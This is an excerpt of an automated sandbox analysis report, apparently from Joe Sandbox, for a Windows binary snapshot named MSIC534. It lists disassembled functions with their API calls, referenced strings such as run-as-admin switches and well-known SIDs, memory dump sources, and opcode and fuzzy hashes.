_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF2C2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF2C33
CertFreeCertificateContext.CRYPT32 ref: 00007FF6D9BF2C52

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Free$Local_invalid_parameter_noinfo_noreturn$Cert$CertificateContext$#224NameString
String ID:
API String ID: 2396941595-0
Opcode ID: 4ef94e95634d936feb579ffd6878f6061d5ba6745a00a47ce77fce0d7c0361a2
Instruction ID: bf1f342e542ac83b63cdba8afaa41f04053843fc7551aefd7c97e02e347a67f6
Opcode Fuzzy Hash: 4ef94e95634d936feb579ffd6878f6061d5ba6745a00a47ce77fce0d7c0361a2
Instruction Fuzzy Hash: FE91AD26F09B8A86FB108F64E4443BD73B1EB55B88F004532CE4D62BA6DF39A5A5C340

Function 00007FF6D9BF50F0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9BF50F0: GetCurrentProcess.KERNEL32 ref: 00007FF6D9BF4B5E
Part of subcall function 00007FF6D9BF50F0: OpenProcessToken.ADVAPI32 ref: 00007FF6D9BF4B70
Part of subcall function 00007FF6D9BF50F0: GetLastError.KERNEL32 ref: 00007FF6D9BF4B7A
Part of subcall function 00007FF6D9BF50F0: CloseHandle.KERNEL32 ref: 00007FF6D9BF4FCE
Part of subcall function 00007FF6D9BF50F0: GetTempPathW.KERNEL32 ref: 00007FF6D9BF4FE1
Part of subcall function 00007FF6D9BF50F0: LocalFree.KERNEL32 ref: 00007FF6D9BF506A

LocalFree.KERNEL32 ref: 00007FF6D9BF5189
LocalFree.KERNEL32 ref: 00007FF6D9BF51EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF5232
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF5238

Strings

GetTempPath2W, xrefs: 00007FF6D9BF4CD3
S-1-5-18, xrefs: 00007FF6D9BF4D72
\SystemTemp\, xrefs: 00007FF6D9BF4D25
Kernel32.dll, xrefs: 00007FF6D9BF4CC3
S-1-5-32-544, xrefs: 00007FF6D9BF4D83

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal$Process_invalid_parameter_noinfo_noreturn$CloseCurrentErrorHandleLastOpenPathTempToken
String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$\SystemTemp\
API String ID: 457122396-595641723
Opcode ID: bc088b1e1915e4bf3ae169a97baa2663a6e8cbc6b8afa9629ee6e2bf363453f5
Instruction ID: b5dc32759a3db3a3df5d49b4746325851e9a8a5c740b5e60910d7137b209f55f
Opcode Fuzzy Hash: bc088b1e1915e4bf3ae169a97baa2663a6e8cbc6b8afa9629ee6e2bf363453f5
Instruction Fuzzy Hash: AA31BF26A1DB8582EA108F58E44837EB370FB89BC0F410632EA8D83B65DF7DE950C700

Function 00007FF6D9BF64A0 Relevance: 15.1, APIs: 10, Instructions: 123timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00007FF6D9BF64F0
OpenProcess.KERNEL32 ref: 00007FF6D9BF650B
GetProcessTimes.KERNEL32 ref: 00007FF6D9BF654D
GetProcessTimes.KERNEL32 ref: 00007FF6D9BF6569
CloseHandle.KERNEL32 ref: 00007FF6D9BF658A
CloseHandle.KERNEL32 ref: 00007FF6D9BF65A8
CloseHandle.KERNEL32 ref: 00007FF6D9BF65D8
CloseHandle.KERNEL32 ref: 00007FF6D9BF65F9
CloseHandle.KERNEL32 ref: 00007FF6D9BF661F
CloseHandle.KERNEL32 ref: 00007FF6D9BF6639

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CloseHandle$Process$OpenTimes
String ID:
API String ID: 1711917922-0
Opcode ID: 3fed05e469d785b38db8d5c61c09361de6d0d3ac9770b5448cc22e197c7e1ea0
Instruction ID: b035032b968ad4f3ee73b8f5208e12abc957c9f2093d82aeccbb27ddbce99b13
Opcode Fuzzy Hash: 3fed05e469d785b38db8d5c61c09361de6d0d3ac9770b5448cc22e197c7e1ea0
Instruction Fuzzy Hash: C2518C36B05B0999EB548F21E9043BE37B0BB457A8F550236CE1E93B94DF3E94A5C340

Function 00007FF6D9C0B3AC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

_Yarn.LIBCPMT ref: 00007FF6D9C0B405
std::_Maklocwcs.LIBCPMT ref: 00007FF6D9C0B421
_Yarn.LIBCPMT ref: 00007FF6D9C0B441
std::_Maklocwcs.LIBCPMT ref: 00007FF6D9C0B45D
std::_Maklocwcs.LIBCPMT ref: 00007FF6D9C0B46D

Strings

:AM:am:PM:pm, xrefs: 00007FF6D9C0B462
:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF6D9C0B416
:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF6D9C0B452

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Maklocwcsstd::_$Yarn
String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
API String ID: 1194159078-3743323925
Opcode ID: b1724372f8d02e56061f6da248e3daa695b14287243a59dfa3dd38e2dd849955
Instruction ID: 8a777f877bc4a594962803aa605ec85c5171ccc3da757283693fd26451f22a1f
Opcode Fuzzy Hash: b1724372f8d02e56061f6da248e3daa695b14287243a59dfa3dd38e2dd849955
Instruction Fuzzy Hash: 98213D22A09B4586EB10DF25E8413BD77B0EB99BC0F444236EA4D93756DF3CE561C740

Function 00007FF6D9C2AC0C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6D9C2AC69

Part of subcall function 00007FF6D9C2CFDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6D9C2D01F
Part of subcall function 00007FF6D9C2CFDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6D9C2D044

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6D9C2AD41
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6D9C2AF8F
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6D9C2B09C

Strings

csm, xrefs: 00007FF6D9C2AC83
csm, xrefs: 00007FF6D9C2AD64
csm, xrefs: 00007FF6D9C2ACEA

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 111225faaa9a5196aee9356e02acf4ffc1e47470c5b2bd150e5c4ecc94d4f646
Instruction ID: f3ffead1a770bf00db445cdf5b735fdde4ef33e13aa23b6db7d0342ed7fadc08
Opcode Fuzzy Hash: 111225faaa9a5196aee9356e02acf4ffc1e47470c5b2bd150e5c4ecc94d4f646
Instruction Fuzzy Hash: 20D17C62A087829AEB21DF6594403AD77B0FB457D8F102136EE8D97B96DF38E0A1C740

Function 00007FF6D9BFC400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BFC44B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFC486
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6D9BFC4CE
_Getctype.LIBCPMT ref: 00007FF6D9BFC50C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFC5D9
LocalFree.KERNEL32 ref: 00007FF6D9BFC640

Strings

bad locale name, xrefs: 00007FF6D9BFC600

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$LocalLockit$AllocFreeGetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 65438402-1405518554
Opcode ID: f5b3452e4bac8e9763551612ab9b5574fba039ae438485d91fec50c29855fb9f
Instruction ID: 29d903aa09531dceb6a2501d8d84b20c1e3eea9a8d5390f844130db4d1df8321
Opcode Fuzzy Hash: f5b3452e4bac8e9763551612ab9b5574fba039ae438485d91fec50c29855fb9f
Instruction Fuzzy Hash: EC718636B0AB458AEB15EFA0D4402BE33B5EB54B88F054936DE4D57A95EF38E0B0C344

Function 00007FF6D9C3663C Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C36680
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C36A67
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C36D1A

Strings

f, xrefs: 00007FF6D9C367A2
p, xrefs: 00007FF6D9C36732
p, xrefs: 00007FF6D9C367AA

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: 4383fbf1c5b30cf23d6a8153630a41a081f371ad9653e55dcaa61270932575c5
Instruction ID: 6a8baf47d463377beb3266f6e38a0e101826d3bf10e51d6747031696371622d6
Opcode Fuzzy Hash: 4383fbf1c5b30cf23d6a8153630a41a081f371ad9653e55dcaa61270932575c5
Instruction Fuzzy Hash: 08129061E0824386FB206F35E25627D76B1FB407D4F948237E68A876C8DF7DE5A08B10

Function 00007FF6D9C2EB8C Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 476COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C2EBCC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C2EF87
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C2F23A

Strings

f, xrefs: 00007FF6D9C2ECC2
p, xrefs: 00007FF6D9C2ECCA
p, xrefs: 00007FF6D9C2EC52

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: cc381cc862897bdc139d895d188244726268c88f62adf3271ea62120292975bc
Instruction ID: 607aa7f154ec37ab17a4f44c43ea85fe75636ec279c7d68d94a923077a1a72d4
Opcode Fuzzy Hash: cc381cc862897bdc139d895d188244726268c88f62adf3271ea62120292975bc
Instruction Fuzzy Hash: 2F127F22B0C24786FB349E15D0542BD76B2FB40790FD46137E69A9B6C4DF7DE4A08B10

Function 00007FF6D9C014C0 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF6D9C01975
RegQueryValueExW.ADVAPI32 ref: 00007FF6D9C0199D

Strings

/EnforcedRunAsAdmin , xrefs: 00007FF6D9C014EA
/RunAsAdmin , xrefs: 00007FF6D9C0163D, 00007FF6D9C016C2
/DontWait , xrefs: 00007FF6D9C0159E
/HideWindow, xrefs: 00007FF6D9C01706

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: OpenQueryValue
String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
API String ID: 4153817207-1914306501
Opcode ID: c1ea196034c89146bda3b9649a23863f6eb0936dcb2f13ed1610820584201723
Instruction ID: b7535f8fd0bba1e5dee31ccbafb2909d23e7b8599c2170f59d23cb6c95921cee
Opcode Fuzzy Hash: c1ea196034c89146bda3b9649a23863f6eb0936dcb2f13ed1610820584201723
Instruction Fuzzy Hash: 4CF172A6E0969281EF659F5691102BDA3F1FF50BC4F498533DA4D87298EF3CEA61C340

Function 00007FF6D9BF7F90 Relevance: 10.6, APIs: 7, Instructions: 148memorythreadCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BF7FF2
LocalFree.KERNEL32 ref: 00007FF6D9BF80C8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BF80F9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF80FF
GetWindowThreadProcessId.USER32 ref: 00007FF6D9BF8125
GetWindowLongPtrW.USER32 ref: 00007FF6D9BF813F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: LocalWindow$AllocConcurrency::cancel_current_taskFreeLongProcessThread_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2769903829-0
Opcode ID: 35574c92888c2c26300d35ec6ef1cb4377479981c8a04ba66c72df11c085166f
Instruction ID: 6435602af1cc2c33a9662f5a4dda1d3573cd7112cdb1db89664d122a432f212b
Opcode Fuzzy Hash: 35574c92888c2c26300d35ec6ef1cb4377479981c8a04ba66c72df11c085166f
Instruction Fuzzy Hash: C151B077709E4582EA148F25E54027E62A1FB48BD4FA48636EBAE87794DF3DD0A1C700

Function 00007FF6D9BFC8F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BFC93B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFC976
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6D9BFC9BE
_Getctype.LIBCPMT ref: 00007FF6D9BFC9FC
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFCAA1

Strings

bad locale name, xrefs: 00007FF6D9BFCAC8

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$AllocGetctypeLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 229129721-1405518554
Opcode ID: 60ebc02f7226483f3ff1111ec5c75b1086ff5987c5adef6584f18516984502ac
Instruction ID: fb95aff0449a85aba85e7c022343034391fa1499b1a5c71686724810975b3ab5
Opcode Fuzzy Hash: 60ebc02f7226483f3ff1111ec5c75b1086ff5987c5adef6584f18516984502ac
Instruction Fuzzy Hash: B5516B22B0AB458AEB11DF60D4402BE33B4EF45B88F054936DE4D93A99DF38E571C394

Function 00007FF6D9BFBE80 Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFBE95
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFBEBA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFBEE5
std::_Facet_Register.LIBCPMT ref: 00007FF6D9BFBF5C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFBF86
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFBF99
LocalFree.KERNEL32 ref: 00007FF6D9BFBFFE

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_FreeLocalRegister
String ID:
API String ID: 4216899657-0
Opcode ID: 5edf41230aeef18f27619a6f764b7c9603305eeb89fed7b8c1b45b463f960f5c
Instruction ID: bd409ae112e1740b05b9a02616c98e8d322577649347351b84131abc5ee05ae1
Opcode Fuzzy Hash: 5edf41230aeef18f27619a6f764b7c9603305eeb89fed7b8c1b45b463f960f5c
Instruction Fuzzy Hash: B941A036A0AB4681EB059F16E8502BD7370EB45BD4F590233EA4D833A5DE7DE4A2C740

Function 00007FF6D9BF8190 Relevance: 10.6, APIs: 7, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF6D9BF81BE
GetProcessId.KERNEL32 ref: 00007FF6D9BF81C7
Sleep.KERNEL32 ref: 00007FF6D9BF8203
EnumWindows.USER32 ref: 00007FF6D9BF821E
BringWindowToTop.USER32 ref: 00007FF6D9BF8230
LocalFree.KERNEL32 ref: 00007FF6D9BF826E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF82DC

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Sleep$BringEnumFreeLocalProcessWindowWindows_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2996238595-0
Opcode ID: d554edbeff9a9736a78683e7aa15fcf636b5e02c3c9ef89d9e6f44d3e1e993a4
Instruction ID: f03b648b6ba32bf70f95828536ae755aa2f77863e3538c5582aad84731c7bc24
Opcode Fuzzy Hash: d554edbeff9a9736a78683e7aa15fcf636b5e02c3c9ef89d9e6f44d3e1e993a4
Instruction Fuzzy Hash: 01318236B1AE4585EE508F95E44427EB361EF857D4F140232EA9F976A8CF3DE4908600

Function 00007FF6D9C2D54C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6D9C2D7FE,?,?,?,00007FF6D9C2D448,?,?,?,00007FF6D9C29EE9), ref: 00007FF6D9C2D5D1
GetLastError.KERNEL32(?,?,?,00007FF6D9C2D7FE,?,?,?,00007FF6D9C2D448,?,?,?,00007FF6D9C29EE9), ref: 00007FF6D9C2D5DF
LoadLibraryExW.KERNEL32(?,?,?,00007FF6D9C2D7FE,?,?,?,00007FF6D9C2D448,?,?,?,00007FF6D9C29EE9), ref: 00007FF6D9C2D609
FreeLibrary.KERNEL32(?,?,?,00007FF6D9C2D7FE,?,?,?,00007FF6D9C2D448,?,?,?,00007FF6D9C29EE9), ref: 00007FF6D9C2D677
GetProcAddress.KERNEL32(?,?,?,00007FF6D9C2D7FE,?,?,?,00007FF6D9C2D448,?,?,?,00007FF6D9C29EE9), ref: 00007FF6D9C2D683

Strings

api-ms-, xrefs: 00007FF6D9C2D5F1

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 42257dd58315f7643f482914cd2c497e8c06dc2da1f724419a6d3b55d7fd13f2
Instruction ID: ba1506f569d13d22cb1e8e993efe493138eb501b33a78a825225e80b679526bf
Opcode Fuzzy Hash: 42257dd58315f7643f482914cd2c497e8c06dc2da1f724419a6d3b55d7fd13f2
Instruction Fuzzy Hash: E731A421A1BA8291EE619F16980067D33F4FF58BE4F591A36DD1D8B794FE3CE4618700

Function 00007FF6D9C0B2B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00007FF6D9C0B332
_Maklocstr.LIBCPMT ref: 00007FF6D9C0B373
